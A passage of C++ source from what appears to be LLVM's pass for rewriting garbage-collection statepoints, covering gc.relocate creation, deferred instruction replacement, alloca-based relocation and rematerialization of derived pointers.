  LLVMContext &Ctx = AL.getContext();
  return AttributeList::get(Ctx, AttributeList::FunctionIndex,
                            AttributeSet::get(Ctx, FnAttrs));
}

/// Helper function to place all gc relocates necessary for the given
/// statepoint.
/// Inputs:
///   liveVariables - list of variables to be relocated.
///   liveStart - index of the first live variable.
///   basePtrs - base pointers.
///   statepointToken - statepoint instruction to which relocates should be
///   bound.
///   Builder - LLVM IR builder to be used to construct new calls.
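// For a statepoint with gc live operands (%base, %derived) this emits, e.g.,
//   %base.relocated = call coldcc i8 addrspace(1)*
//       @llvm.experimental.gc.relocate.p1i8(token %safepoint_token, i32 7, i32 7)
//   %derived.relocated = call coldcc i8 addrspace(1)*
//       @llvm.experimental.gc.relocate.p1i8(token %safepoint_token, i32 7, i32 8)
// where the i32 arguments index the base and derived pointers within the
// statepoint's argument list (the offsets shown are illustrative only).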
static void CreateGCRelocates(ArrayRef<Value *> LiveVariables,
                              const int LiveStart,
                              ArrayRef<Value *> BasePtrs,
                              Instruction *StatepointToken,
                              IRBuilder<> Builder) {
  if (LiveVariables.empty())
    return;

  auto FindIndex = [](ArrayRef<Value *> LiveVec, Value *Val) {
    auto ValIt = llvm::find(LiveVec, Val);
    assert(ValIt != LiveVec.end() && "Val not found in LiveVec!");
    size_t Index = std::distance(LiveVec.begin(), ValIt);
    assert(Index < LiveVec.size() && "Bug in std::find?");
    return Index;
  };
  Module *M = StatepointToken->getModule();

  // All gc_relocate are generated as i8 addrspace(1)* (or a vector type whose
  // element type is i8 addrspace(1)*). We originally generated unique
  // declarations for each pointer type, but this proved problematic because
  // the intrinsic mangling code is incomplete and fragile. Since we're moving
  // towards a single unified pointer type anyways, we can just cast everything
  // to an i8* of the right address space. A bitcast is added later to convert
  // gc_relocate to the actual value's type.
  auto getGCRelocateDecl = [&](Type *Ty) {
    assert(isHandledGCPointerType(Ty));
    auto AS = Ty->getScalarType()->getPointerAddressSpace();
    Type *NewTy = Type::getInt8PtrTy(M->getContext(), AS);
    if (auto *VT = dyn_cast<VectorType>(Ty))
      NewTy = VectorType::get(NewTy, VT->getNumElements());
    return Intrinsic::getDeclaration(M, Intrinsic::experimental_gc_relocate,
                                     {NewTy});
  };

  // Lazily populated map from input types to the canonicalized form mentioned
  // in the comment above. This should probably be cached somewhere more
  // broadly.
  DenseMap<Type *, Function *> TypeToDeclMap;

  for (unsigned i = 0; i < LiveVariables.size(); i++) {
    // Generate the gc.relocate call and save the result
    Value *BaseIdx =
        Builder.getInt32(LiveStart + FindIndex(LiveVariables, BasePtrs[i]));
    Value *LiveIdx = Builder.getInt32(LiveStart + i);

    Type *Ty = LiveVariables[i]->getType();
    if (!TypeToDeclMap.count(Ty))
      TypeToDeclMap[Ty] = getGCRelocateDecl(Ty);
    Function *GCRelocateDecl = TypeToDeclMap[Ty];

    // only specify a debug name if we can give a useful one
    CallInst *Reloc = Builder.CreateCall(
        GCRelocateDecl, {StatepointToken, BaseIdx, LiveIdx},
        suffixed_name_or(LiveVariables[i], ".relocated", ""));
    // Trick CodeGen into thinking there are lots of free registers at this
    // fake call.
    Reloc->setCallingConv(CallingConv::Cold);
  }
}

namespace {

/// This struct is used to defer RAUWs and `eraseFromParent`s. Using this
/// avoids having to worry about keeping around dangling pointers to Values.
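/// For example, when a call that itself needs a safepoint is live at another
/// safepoint, we record createRAUW(OldCall, GCResult) now but only perform the
/// RAUW and erase after every record's live set has been rewritten, so no
/// PartiallyConstructedSafepointRecord is left holding a dangling
/// Instruction pointer.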
class DeferredReplacement {
  Instruction *Old = nullptr;
  Instruction *New = nullptr;
  bool IsDeoptimize = false;

  DeferredReplacement() = default;

public:
  static DeferredReplacement createRAUW(Instruction *Old, Instruction *New) {
    assert(Old != New && Old && New &&
           "Cannot RAUW equal values or to / from null!");

    DeferredReplacement D;
    D.Old = Old;
    D.New = New;
    return D;
  }

  static DeferredReplacement createDelete(Instruction *ToErase) {
    DeferredReplacement D;
    D.Old = ToErase;
    return D;
  }

  static DeferredReplacement createDeoptimizeReplacement(Instruction *Old) {
#ifndef NDEBUG
    auto *F = cast<CallInst>(Old)->getCalledFunction();
    assert(F && F->getIntrinsicID() == Intrinsic::experimental_deoptimize &&
           "Only way to construct a deoptimize deferred replacement");
#endif
    DeferredReplacement D;
    D.Old = Old;
    D.IsDeoptimize = true;
    return D;
  }

  /// Does the task represented by this instance.
  void doReplacement() {
    Instruction *OldI = Old;
    Instruction *NewI = New;

    assert(OldI != NewI && "Disallowed at construction?!");
    assert((!IsDeoptimize || !New) &&
           "Deoptimize intrinsics are not replaced!");

    Old = nullptr;
    New = nullptr;

    if (NewI)
      OldI->replaceAllUsesWith(NewI);

    if (IsDeoptimize) {
      // Note: we've inserted instructions, so the call to llvm.deoptimize may
      // not necessarily be followed by the matching return.
      auto *RI = cast<ReturnInst>(OldI->getParent()->getTerminator());
      new UnreachableInst(RI->getContext(), RI);
      RI->eraseFromParent();
    }

    OldI->eraseFromParent();
  }
};

} // end anonymous namespace

static StringRef getDeoptLowering(CallBase *Call) {
  const char *DeoptLowering = "deopt-lowering";
  if (Call->hasFnAttr(DeoptLowering)) {
    // FIXME: Calls have a *really* confusing interface around attributes
    // with values.
    const AttributeList &CSAS = Call->getAttributes();
    if (CSAS.hasAttribute(AttributeList::FunctionIndex, DeoptLowering))
      return CSAS.getAttribute(AttributeList::FunctionIndex, DeoptLowering)
          .getValueAsString();
    Function *F = Call->getCalledFunction();
    assert(F && F->hasFnAttribute(DeoptLowering));
    return F->getFnAttribute(DeoptLowering).getValueAsString();
  }
  return "live-through";
}

static void
makeStatepointExplicitImpl(CallBase *Call, /* to replace */
                           const SmallVectorImpl<Value *> &BasePtrs,
                           const SmallVectorImpl<Value *> &LiveVariables,
                           PartiallyConstructedSafepointRecord &Result,
                           std::vector<DeferredReplacement> &Replacements) {
  assert(BasePtrs.size() == LiveVariables.size());

  // Then go ahead and use the builder to actually do the inserts. We insert
  // immediately before the previous instruction under the assumption that all
  // arguments will be available here. We can't insert afterwards since we may
  // be replacing a terminator.
  IRBuilder<> Builder(Call);

  ArrayRef<Value *> GCArgs(LiveVariables);
  uint64_t StatepointID = StatepointDirectives::DefaultStatepointID;
  uint32_t NumPatchBytes = 0;
  uint32_t Flags = uint32_t(StatepointFlags::None);

  ArrayRef<Use> CallArgs(Call->arg_begin(), Call->arg_end());
  ArrayRef<Use> DeoptArgs = GetDeoptBundleOperands(Call);
  ArrayRef<Use> TransitionArgs;
  if (auto TransitionBundle =
          Call->getOperandBundle(LLVMContext::OB_gc_transition)) {
    Flags |= uint32_t(StatepointFlags::GCTransition);
    TransitionArgs = TransitionBundle->Inputs;
  }

  // Instead of lowering calls to @llvm.experimental.deoptimize as normal calls
  // with a return value, we lower them as never returning calls to
  // __llvm_deoptimize that are followed by unreachable to get better codegen.
  bool IsDeoptimize = false;

  StatepointDirectives SD =
      parseStatepointDirectivesFromAttrs(Call->getAttributes());
  if (SD.NumPatchBytes)
    NumPatchBytes = *SD.NumPatchBytes;
  if (SD.StatepointID)
    StatepointID = *SD.StatepointID;

  // Pass through the requested lowering if any. The default is live-through.
  StringRef DeoptLowering = getDeoptLowering(Call);
  if (DeoptLowering.equals("live-in"))
    Flags |= uint32_t(StatepointFlags::DeoptLiveIn);
  else {
    assert(DeoptLowering.equals("live-through") && "Unsupported value!");
  }

  Value *CallTarget = Call->getCalledValue();
  if (Function *F = dyn_cast<Function>(CallTarget)) {
    if (F->getIntrinsicID() == Intrinsic::experimental_deoptimize) {
      // Calls to llvm.experimental.deoptimize are lowered to calls to the
      // __llvm_deoptimize symbol. We want to resolve this now, since the
      // verifier does not allow taking the address of an intrinsic function.

      SmallVector<Type *, 8> DomainTy;
      for (Value *Arg : CallArgs)
        DomainTy.push_back(Arg->getType());
      auto *FTy = FunctionType::get(Type::getVoidTy(F->getContext()), DomainTy,
                                    /* isVarArg = */ false);

      // Note: CallTarget can be a bitcast instruction of a symbol if there are
      // calls to @llvm.experimental.deoptimize with different argument types in
      // the same module. This is fine -- we assume the frontend knew what it
      // was doing when generating this kind of IR.
      CallTarget = F->getParent()
                       ->getOrInsertFunction("__llvm_deoptimize", FTy)
                       .getCallee();

      IsDeoptimize = true;
    }
  }

  // Create the statepoint given all the arguments
  Instruction *Token = nullptr;
  if (auto *CI = dyn_cast<CallInst>(Call)) {
    CallInst *SPCall = Builder.CreateGCStatepointCall(
        StatepointID, NumPatchBytes, CallTarget, Flags, CallArgs,
        TransitionArgs, DeoptArgs, GCArgs, "safepoint_token");

    SPCall->setTailCallKind(CI->getTailCallKind());
    SPCall->setCallingConv(CI->getCallingConv());

    // Currently we will fail on parameter attributes and on certain
    // function attributes. In case if we can handle this set of attributes -
    // set up function attrs directly on statepoint and return attrs later for
    // gc_result intrinsic.
    SPCall->setAttributes(legalizeCallAttributes(CI->getAttributes()));

    Token = SPCall;

    // Put the following gc_result and gc_relocate calls immediately after
    // the old call (which we're about to delete)
    assert(CI->getNextNode() && "Not a terminator, must have next!");
    Builder.SetInsertPoint(CI->getNextNode());
    Builder.SetCurrentDebugLocation(CI->getNextNode()->getDebugLoc());
  } else {
    auto *II = cast<InvokeInst>(Call);

    // Insert the new invoke into the old block. We'll remove the old one in a
    // moment at which point this will become the new terminator for the
    // original block.
    InvokeInst *SPInvoke = Builder.CreateGCStatepointInvoke(
        StatepointID, NumPatchBytes, CallTarget, II->getNormalDest(),
        II->getUnwindDest(), Flags, CallArgs, TransitionArgs, DeoptArgs, GCArgs,
        "statepoint_token");

    SPInvoke->setCallingConv(II->getCallingConv());

    // Currently we will fail on parameter attributes and on certain
    // function attributes. In case if we can handle this set of attributes -
    // set up function attrs directly on statepoint and return attrs later for
    // gc_result intrinsic.
    SPInvoke->setAttributes(legalizeCallAttributes(II->getAttributes()));

    Token = SPInvoke;

    // Generate gc relocates in exceptional path
    BasicBlock *UnwindBlock = II->getUnwindDest();
    assert(!isa<PHINode>(UnwindBlock->begin()) &&
           UnwindBlock->getUniquePredecessor() &&
           "can't safely insert in this block!");

    Builder.SetInsertPoint(&*UnwindBlock->getFirstInsertionPt());
    Builder.SetCurrentDebugLocation(II->getDebugLoc());

    // Attach exceptional gc relocates to the landingpad.
    Instruction *ExceptionalToken = UnwindBlock->getLandingPadInst();
    Result.UnwindToken = ExceptionalToken;

    const unsigned LiveStartIdx = Statepoint(Token).gcArgsStartIdx();
    CreateGCRelocates(LiveVariables, LiveStartIdx, BasePtrs, ExceptionalToken,
                      Builder);

    // Generate gc relocates and returns for normal block
    BasicBlock *NormalDest = II->getNormalDest();
    assert(!isa<PHINode>(NormalDest->begin()) &&
           NormalDest->getUniquePredecessor() &&
           "can't safely insert in this block!");

    Builder.SetInsertPoint(&*NormalDest->getFirstInsertionPt());

    // gc relocates will be generated later as if it were regular call
    // statepoint
  }
  assert(Token && "Should be set in one of the above branches!");

  if (IsDeoptimize) {
    // If we're wrapping an @llvm.experimental.deoptimize in a statepoint, we
    // transform the tail-call like structure to a call to a void function
    // followed by unreachable to get better codegen.
    Replacements.push_back(
        DeferredReplacement::createDeoptimizeReplacement(Call));
  } else {
    Token->setName("statepoint_token");
    if (!Call->getType()->isVoidTy() && !Call->use_empty()) {
      StringRef Name = Call->hasName() ? Call->getName() : "";
      CallInst *GCResult = Builder.CreateGCResult(Token, Call->getType(), Name);
      GCResult->setAttributes(
          AttributeList::get(GCResult->getContext(), AttributeList::ReturnIndex,
                             Call->getAttributes().getRetAttributes()));

      // We cannot RAUW or delete CS.getInstruction() because it could be in the
      // live set of some other safepoint, in which case that safepoint's
      // PartiallyConstructedSafepointRecord will hold a raw pointer to this
      // llvm::Instruction. Instead, we defer the replacement and deletion to
      // after the live sets have been made explicit in the IR, and we no longer
      // have raw pointers to worry about.
      Replacements.emplace_back(
          DeferredReplacement::createRAUW(Call, GCResult));
    } else {
      Replacements.emplace_back(DeferredReplacement::createDelete(Call));
    }
  }

  Result.StatepointToken = Token;

  // Second, create a gc.relocate for every live variable
  const unsigned LiveStartIdx = Statepoint(Token).gcArgsStartIdx();
  CreateGCRelocates(LiveVariables, LiveStartIdx, BasePtrs, Token, Builder);
}

// Replace an existing gc.statepoint with a new one and a set of gc.relocates
// which make the relocations happening at this safepoint explicit.
//
// WARNING: Does not do any fixup to adjust users of the original live
// values. That's the caller's responsibility.
static void
makeStatepointExplicit(DominatorTree &DT, CallBase *Call,
                       PartiallyConstructedSafepointRecord &Result,
                       std::vector<DeferredReplacement> &Replacements) {
  const auto &LiveSet = Result.LiveSet;
  const auto &PointerToBase = Result.PointerToBase;

  // Convert to vector for efficient cross referencing.
  SmallVector<Value *, 64> BaseVec, LiveVec;
  LiveVec.reserve(LiveSet.size());
  BaseVec.reserve(LiveSet.size());
  for (Value *L : LiveSet) {
    LiveVec.push_back(L);
    assert(PointerToBase.count(L));
    Value *Base = PointerToBase.find(L)->second;
    BaseVec.push_back(Base);
  }
  assert(LiveVec.size() == BaseVec.size());

  // Do the actual rewriting and delete the old statepoint
  makeStatepointExplicitImpl(Call, BaseVec, LiveVec, Result, Replacements);
}

// Helper function for relocationViaAlloca.
//
// It receives an iterator to the statepoint gc relocates and emits a store to
// the assigned location (via allocaMap) for each one of them. It adds the
// visited values into the visitedLiveValues set, which we will later use for
// sanity checking.
static void
insertRelocationStores(iterator_range<Value::user_iterator> GCRelocs,
                       DenseMap<Value *, AllocaInst *> &AllocaMap,
                       DenseSet<Value *> &VisitedLiveValues) {
  for (User *U : GCRelocs) {
    GCRelocateInst *Relocate = dyn_cast<GCRelocateInst>(U);
    if (!Relocate)
      continue;

    Value *OriginalValue = Relocate->getDerivedPtr();
    assert(AllocaMap.count(OriginalValue));
    Value *Alloca = AllocaMap[OriginalValue];

    // Emit store into the related alloca
    // All gc_relocates are i8 addrspace(1)* typed, and it must be bitcasted to
    // the correct type according to alloca.
    assert(Relocate->getNextNode() &&
           "Should always have one since it's not a terminator");
    IRBuilder<> Builder(Relocate->getNextNode());
    Value *CastedRelocatedValue =
        Builder.CreateBitCast(Relocate,
                              cast<AllocaInst>(Alloca)->getAllocatedType(),
                              suffixed_name_or(Relocate, ".casted", ""));

    StoreInst *Store = new StoreInst(CastedRelocatedValue, Alloca);
    Store->insertAfter(cast<Instruction>(CastedRelocatedValue));

#ifndef NDEBUG
    VisitedLiveValues.insert(OriginalValue);
#endif
  }
}

// Helper function for the "relocationViaAlloca". Similar to the
// "insertRelocationStores" but works for rematerialized values.
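// For example (hypothetical names), if %gep.remat was cloned after a
// statepoint to stand in for the original %gep, this emits
//   store i8 addrspace(1)* %gep.remat, i8 addrspace(1)** %gep.alloca
// right after the rematerialized definition, mirroring what
// insertRelocationStores does for relocated values.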
static void insertRematerializationStores(
    const RematerializedValueMapTy &RematerializedValues,
    DenseMap<Value *, AllocaInst *> &AllocaMap,
    DenseSet<Value *> &VisitedLiveValues) {
  for (auto RematerializedValuePair: RematerializedValues) {
    Instruction *RematerializedValue = RematerializedValuePair.first;
    Value *OriginalValue = RematerializedValuePair.second;

    assert(AllocaMap.count(OriginalValue) &&
           "Can not find alloca for rematerialized value");
    Value *Alloca = AllocaMap[OriginalValue];

    StoreInst *Store = new StoreInst(RematerializedValue, Alloca);
    Store->insertAfter(RematerializedValue);

#ifndef NDEBUG
    VisitedLiveValues.insert(OriginalValue);
#endif
  }
}

/// Do all the relocation update via allocas and mem2reg
static void relocationViaAlloca(
    Function &F, DominatorTree &DT, ArrayRef<Value *> Live,
    ArrayRef<PartiallyConstructedSafepointRecord> Records) {
#ifndef NDEBUG
  // record initial number of (static) allocas; we'll check we have the same
  // number when we get done.
  int InitialAllocaNum = 0;
  for (Instruction &I : F.getEntryBlock())
    if (isa<AllocaInst>(I))
      InitialAllocaNum++;
#endif

  // TODO-PERF: change data structures, reserve
  DenseMap<Value *, AllocaInst *> AllocaMap;
  SmallVector<AllocaInst *, 200> PromotableAllocas;
  // Used later to check that we have enough allocas to store all values
  std::size_t NumRematerializedValues = 0;
  PromotableAllocas.reserve(Live.size());

  // Emit alloca for "LiveValue" and record it in "allocaMap" and
  // "PromotableAllocas"
  const DataLayout &DL = F.getParent()->getDataLayout();
  auto emitAllocaFor = [&](Value *LiveValue) {
    AllocaInst *Alloca = new AllocaInst(LiveValue->getType(),
                                        DL.getAllocaAddrSpace(), "",
                                        F.getEntryBlock().getFirstNonPHI());
    AllocaMap[LiveValue] = Alloca;
    PromotableAllocas.push_back(Alloca);
  };

  // Emit alloca for each live gc pointer
  for (Value *V : Live)
    emitAllocaFor(V);

  // Emit allocas for rematerialized values
  for (const auto &Info : Records)
    for (auto RematerializedValuePair : Info.RematerializedValues) {
      Value *OriginalValue = RematerializedValuePair.second;
      if (AllocaMap.count(OriginalValue) != 0)
        continue;

      emitAllocaFor(OriginalValue);
      ++NumRematerializedValues;
    }

  // The next two loops are part of the same conceptual operation. We need to
  // insert a store to the alloca after the original def and at each
  // redefinition. We need to insert a load before each use. These are split
  // into distinct loops for performance reasons.

  // Update gc pointer after each statepoint: either store a relocated value or
  // null (if no relocated value was found for this gc pointer and it is not a
  // gc_result). This must happen before we update the statepoint with load of
  // alloca otherwise we lose the link between statepoint and old def.
  for (const auto &Info : Records) {
    Value *Statepoint = Info.StatepointToken;

    // This will be used for consistency check
    DenseSet<Value *> VisitedLiveValues;

    // Insert stores for normal statepoint gc relocates
    insertRelocationStores(Statepoint->users(), AllocaMap, VisitedLiveValues);

    // In case if it was invoke statepoint
    // we will insert stores for exceptional path gc relocates.
    if (isa<InvokeInst>(Statepoint)) {
      insertRelocationStores(Info.UnwindToken->users(), AllocaMap,
                             VisitedLiveValues);
    }

    // Do similar thing with rematerialized values
    insertRematerializationStores(Info.RematerializedValues, AllocaMap,
                                  VisitedLiveValues);

    if (ClobberNonLive) {
      // As a debugging aid, pretend that an unrelocated pointer becomes null at
      // the gc.statepoint. This will turn some subtle GC problems into
      // slightly easier to debug SEGVs. Note that on large IR files with
      // lots of gc.statepoints this is extremely costly both memory and time
      // wise.
      SmallVector<AllocaInst *, 64> ToClobber;
      for (auto Pair : AllocaMap) {
        Value *Def = Pair.first;
        AllocaInst *Alloca = Pair.second;

        // This value was relocated
        if (VisitedLiveValues.count(Def)) {
          continue;
        }
        ToClobber.push_back(Alloca);
      }

      auto InsertClobbersAt = [&](Instruction *IP) {
        for (auto *AI : ToClobber) {
          auto PT = cast<PointerType>(AI->getAllocatedType());
          ConstantPointerNull *CPN = ConstantPointerNull::get(PT);
          StoreInst *Store = new StoreInst(CPN, AI);
          Store->insertBefore(IP);
        }
      };

      // Insert the clobbering stores. These may get intermixed with the
      // gc.results and gc.relocates, but that's fine.
      if (auto II = dyn_cast<InvokeInst>(Statepoint)) {
        InsertClobbersAt(&*II->getNormalDest()->getFirstInsertionPt());
        InsertClobbersAt(&*II->getUnwindDest()->getFirstInsertionPt());
      } else {
        InsertClobbersAt(cast<Instruction>(Statepoint)->getNextNode());
      }
    }
  }

  // Update use with load allocas and add store for gc_relocated.
  for (auto Pair : AllocaMap) {
    Value *Def = Pair.first;
    AllocaInst *Alloca = Pair.second;

    // We pre-record the uses of allocas so that we don't have to worry about
    // later update that changes the user information.
    SmallVector<Instruction *, 20> Uses;
    // PERF: trade a linear scan for repeated reallocation
    Uses.reserve(Def->getNumUses());
    for (User *U : Def->users()) {
      if (!isa<ConstantExpr>(U)) {
        // If the def has a ConstantExpr use, then the def is either a
        // ConstantExpr use itself or null. In either case
        // (recursively in the first, directly in the second), the oop
        // it is ultimately dependent on is null and this particular
        // use does not need to be fixed up.
        Uses.push_back(cast<Instruction>(U));
      }
    }

    llvm::sort(Uses);
    auto Last = std::unique(Uses.begin(), Uses.end());
    Uses.erase(Last, Uses.end());

    for (Instruction *Use : Uses) {
      if (isa<PHINode>(Use)) {
        PHINode *Phi = cast<PHINode>(Use);
        for (unsigned i = 0; i < Phi->getNumIncomingValues(); i++) {
          if (Def == Phi->getIncomingValue(i)) {
            LoadInst *Load =
                new LoadInst(Alloca->getAllocatedType(), Alloca, "",
                             Phi->getIncomingBlock(i)->getTerminator());
            Phi->setIncomingValue(i, Load);
          }
        }
      } else {
        LoadInst *Load =
            new LoadInst(Alloca->getAllocatedType(), Alloca, "", Use);
        Use->replaceUsesOfWith(Def, Load);
      }
    }

    // Emit store for the initial gc value. Store must be inserted after load,
    // otherwise store will be in alloca's use list and an extra load will be
    // inserted before it.
    StoreInst *Store = new StoreInst(Def, Alloca);
    if (Instruction *Inst = dyn_cast<Instruction>(Def)) {
      if (InvokeInst *Invoke = dyn_cast<InvokeInst>(Inst)) {
        // InvokeInst is a terminator so the store needs to be inserted into its
        // normal destination block.
        BasicBlock *NormalDest = Invoke->getNormalDest();
        Store->insertBefore(NormalDest->getFirstNonPHI());
      } else {
        assert(!Inst->isTerminator() &&
               "The only terminator that can produce a value is "
               "InvokeInst which is handled above.");
        Store->insertAfter(Inst);
      }
    } else {
      assert(isa<Argument>(Def));
      Store->insertAfter(cast<Instruction>(Alloca));
    }
  }

  assert(PromotableAllocas.size() == Live.size() + NumRematerializedValues &&
         "we must have the same allocas with lives");
  if (!PromotableAllocas.empty()) {
    // Apply mem2reg to promote alloca to SSA
    PromoteMemToReg(PromotableAllocas, DT);
  }

#ifndef NDEBUG
  for (auto &I : F.getEntryBlock())
    if (isa<AllocaInst>(I))
      InitialAllocaNum--;
  assert(InitialAllocaNum == 0 && "We must not introduce any extra allocas");
#endif
}

/// Implement a unique function which doesn't require we sort the input
/// vector. Doing so has the effect of changing the output of a couple of
/// tests in ways which make them less useful in testing fused safepoints.
template <typename T> static void unique_unsorted(SmallVectorImpl<T> &Vec) {
  SmallSet<T, 8> Seen;
  Vec.erase(remove_if(Vec, [&](const T &V) { return !Seen.insert(V).second; }),
            Vec.end());
}

/// Insert holders so that each Value is obviously live through the entire
/// lifetime of the call.
static void insertUseHolderAfter(CallBase *Call, const ArrayRef<Value *> Values,
                                 SmallVectorImpl<CallInst *> &Holders) {
  if (Values.empty())
    // No values to hold live, might as well not insert the empty holder
    return;

  Module *M = Call->getModule();
  // Use a dummy vararg function to actually hold the values live
  FunctionCallee Func = M->getOrInsertFunction(
      "__tmp_use", FunctionType::get(Type::getVoidTy(M->getContext()), true));
  if (isa<CallInst>(Call)) {
    // For call safepoints insert dummy calls right after safepoint
    Holders.push_back(
        CallInst::Create(Func, Values, "", &*++Call->getIterator()));
    return;
  }
  // For invoke safepoints insert dummy calls both in normal and
  // exceptional destination blocks
  auto *II = cast<InvokeInst>(Call);
  Holders.push_back(CallInst::Create(
      Func, Values, "", &*II->getNormalDest()->getFirstInsertionPt()));
  Holders.push_back(CallInst::Create(
      Func, Values, "", &*II->getUnwindDest()->getFirstInsertionPt()));
}

static void findLiveReferences(
    Function &F, DominatorTree &DT, ArrayRef<CallBase *> toUpdate,
    MutableArrayRef<struct PartiallyConstructedSafepointRecord> records) {
  GCPtrLivenessData OriginalLivenessData;
  computeLiveInValues(DT, F, OriginalLivenessData);
  for (size_t i = 0; i < records.size(); i++) {
    struct PartiallyConstructedSafepointRecord &info = records[i];
    analyzeParsePointLiveness(DT, OriginalLivenessData, toUpdate[i], info);
  }
}

// Helper function for the "rematerializeLiveValues". It walks use chain
// starting from the "CurrentValue" until it reaches the root of the chain, i.e.
// the base or a value it cannot process. Only "simple" values are processed
// (currently it is GEP's and casts). The returned root is examined by the
// callers of findRematerializableChainToBasePointer. Fills "ChainToBase" array
// with all visited values.
static Value* findRematerializableChainToBasePointer(
    SmallVectorImpl<Instruction*> &ChainToBase,
    Value *CurrentValue) {
  if (GetElementPtrInst *GEP = dyn_cast<GetElementPtrInst>(CurrentValue)) {
    ChainToBase.push_back(GEP);
    return findRematerializableChainToBasePointer(ChainToBase,
                                                  GEP->getPointerOperand());
  }

  if (CastInst *CI = dyn_cast<CastInst>(CurrentValue)) {
    if (!CI->isNoopCast(CI->getModule()->getDataLayout()))
      return CI;

    ChainToBase.push_back(CI);
    return findRematerializableChainToBasePointer(ChainToBase,
                                                  CI->getOperand(0));
  }

  // We have reached the root of the chain, which is either equal to the base or
  // is the first unsupported value along the use chain.
  return CurrentValue;
}

// Helper function for the "rematerializeLiveValues". Compute cost of the use
// chain we are going to rematerialize.
static unsigned
chainToBasePointerCost(SmallVectorImpl<Instruction*> &Chain,
                       TargetTransformInfo &TTI) {
  unsigned Cost = 0;

  for (Instruction *Instr : Chain) {
    if (CastInst *CI = dyn_cast<CastInst>(Instr)) {
      assert(CI->isNoopCast(CI->getModule()->getDataLayout()) &&
             "non noop cast is found during rematerialization");

      Type *SrcTy = CI->getOperand(0)->getType();
      Cost += TTI.getCastInstrCost(CI->getOpcode(), CI->getType(), SrcTy, CI);

    } else if (GetElementPtrInst *GEP = dyn_cast<GetElementPtrInst>(Instr)) {
      // Cost of the address calculation
      Type *ValTy = GEP->getSourceElementType();
      Cost += TTI.getAddressComputationCost(ValTy);

      // And cost of the GEP itself
      // TODO: Use TTI->getGEPCost here (it exists, but appears to be not
      // allowed for the external usage)
      if (!GEP->hasAllConstantIndices())
        Cost += 2;

    } else {
      llvm_unreachable("unsupported instruction type during rematerialization");
    }
  }

  return Cost;
}

static bool AreEquivalentPhiNodes(PHINode &OrigRootPhi, PHINode &AlternateRootPhi) {
  unsigned PhiNum = OrigRootPhi.getNumIncomingValues();
  if (PhiNum != AlternateRootPhi.getNumIncomingValues() ||
      OrigRootPhi.getParent() != AlternateRootPhi.getParent())
    return false;
  // Map of incoming values and their corresponding basic blocks of
  // OrigRootPhi.
  SmallDenseMap<Value *, BasicBlock *, 8> CurrentIncomingValues;
  for (unsigned i = 0; i < PhiNum; i++)
    CurrentIncomingValues[OrigRootPhi.getIncomingValue(i)] =
        OrigRootPhi.getIncomingBlock(i);

  // Both current and base PHIs should have same incoming values and
  // the same basic blocks corresponding to the incoming values.
  for (unsigned i = 0; i < PhiNum; i++) {
    auto CIVI =
        CurrentIncomingValues.find(AlternateRootPhi.getIncomingValue(i));
    if (CIVI == CurrentIncomingValues.end())
      return false;
    BasicBlock *CurrentIncomingBB = CIVI->second;
    if (CurrentIncomingBB != AlternateRootPhi.getIncomingBlock(i))
      return false;
  }
  return true;
}

// From the statepoint live set pick values that are cheaper to recompute than
// to relocate. Remove these values from the live set, rematerialize them after
// statepoint and record them in "Info" structure. Note that similar to
// relocated values we don't do any user adjustments here.
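// For example (hypothetical names), with
//   %base = ...                                      ; live at the statepoint
//   %derived = getelementptr i8, i8 addrspace(1)* %base, i64 8
// it can be cheaper to drop %derived from the live set and re-issue the
// getelementptr from the relocated %base after the statepoint than to ask
// the GC to relocate both pointers.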
static void rematerializeLiveValues(CallBase *Call,
                                    PartiallyConstructedSafepointRecord &Info,
                                    TargetTransformInfo &TTI) {
  const unsigned int ChainLengthThreshold = 10;

  // Record values we are going to delete from this statepoint live set.
  // We cannot do this in the following loop due to iterator invalidation.
  SmallVector<Value *, 32> LiveValuesToBeDeleted;

  for (Value *LiveValue: Info.LiveSet) {
    // For each live pointer find its defining chain
    SmallVector<Instruction *, 3> ChainToBase;
    assert(Info.PointerToBase.count(LiveValue));
    Value *RootOfChain =
        findRematerializableChainToBasePointer(ChainToBase,
                                               LiveValue);

    // Nothing to do, or chain is too long
    if (ChainToBase.size() == 0 ||
        ChainToBase.size() > ChainLengthThreshold)
      continue;

    // Handle the scenario where the RootOfChain is not equal to the
    // Base Value, but they are essentially the same phi values.
    if (RootOfChain != Info.PointerToBase[LiveValue]) {
      PHINode *OrigRootPhi = dyn_cast<PHINode>(RootOfChain);
      PHINode *AlternateRootPhi = dyn_cast<PHINode>(Info.PointerToBase[LiveValue]);
      if (!OrigRootPhi || !AlternateRootPhi)
        continue;
      // PHI nodes that have the same incoming values, and belong to the same
      // basic block are essentially the same SSA value. When the original phi
      // has incoming values with different base pointers, the original phi is
      // marked as conflict, and an additional `AlternateRootPhi` with the same
      // incoming values gets generated by the findBasePointer function. We need
      // to check that the newly generated AlternateRootPhi (.base version of
      // phi) and RootOfChain (the original phi node itself) are the same, so
      // that we can rematerialize the gep and casts. This is a workaround for
      // the deficiency in the findBasePointer algorithm.
      if (!AreEquivalentPhiNodes(*OrigRootPhi, *AlternateRootPhi))
        continue;
      // Now that the phi nodes are proved to be the same, assert that
      // findBasePointer's newly generated AlternateRootPhi is present in the
      // liveset of the call.
      assert(Info.LiveSet.count(AlternateRootPhi));
    }
    // Compute cost of this chain
    unsigned Cost = chainToBasePointerCost(ChainToBase, TTI);
    // TODO: We can also account for cases when we will be able to remove some
    //       of the rematerialized values by later optimization passes. I.e if
    //       we rematerialized several intersecting chains. Or if original values
    //       don't have any uses besides this statepoint.

    // For invokes we need to rematerialize each chain twice - for normal and
    // for unwind basic blocks. Model this by multiplying cost by two.
    if (isa<InvokeInst>(Call)) {
      Cost *= 2;
    }
    // If it's too expensive - skip it
    if (Cost >= RematerializationThreshold)
      continue;

    // Remove value from the live set
    LiveValuesToBeDeleted.push_back(LiveValue);

    // Clone instructions and record them inside "Info" structure

    // Walk backwards to visit top-most instructions first
    std::reverse(ChainToBase.begin(), ChainToBase.end());

    // Utility function which clones all instructions from "ChainToBase"
    // and inserts them before "InsertBefore". Returns rematerialized value
    // which should be used after statepoint.
    auto rematerializeChain = [&ChainToBase](
        Instruction *InsertBefore, Value *RootOfChain, Value *AlternateLiveBase) {
      Instruction *LastClonedValue = nullptr;
      Instruction *LastValue = nullptr;
      for (Instruction *Instr: ChainToBase) {
        // Only GEP's and casts are supported as we need to be careful to not
        // introduce any new uses of pointers not in the liveset.
        // Note that it's fine to introduce new uses of pointers which were
        // otherwise not used after this statepoint.
        assert(isa<GetElementPtrInst>(Instr) || isa<CastInst>(Instr));

        Instruction *ClonedValue = Instr->clone();
        ClonedValue->insertBefore(InsertBefore);
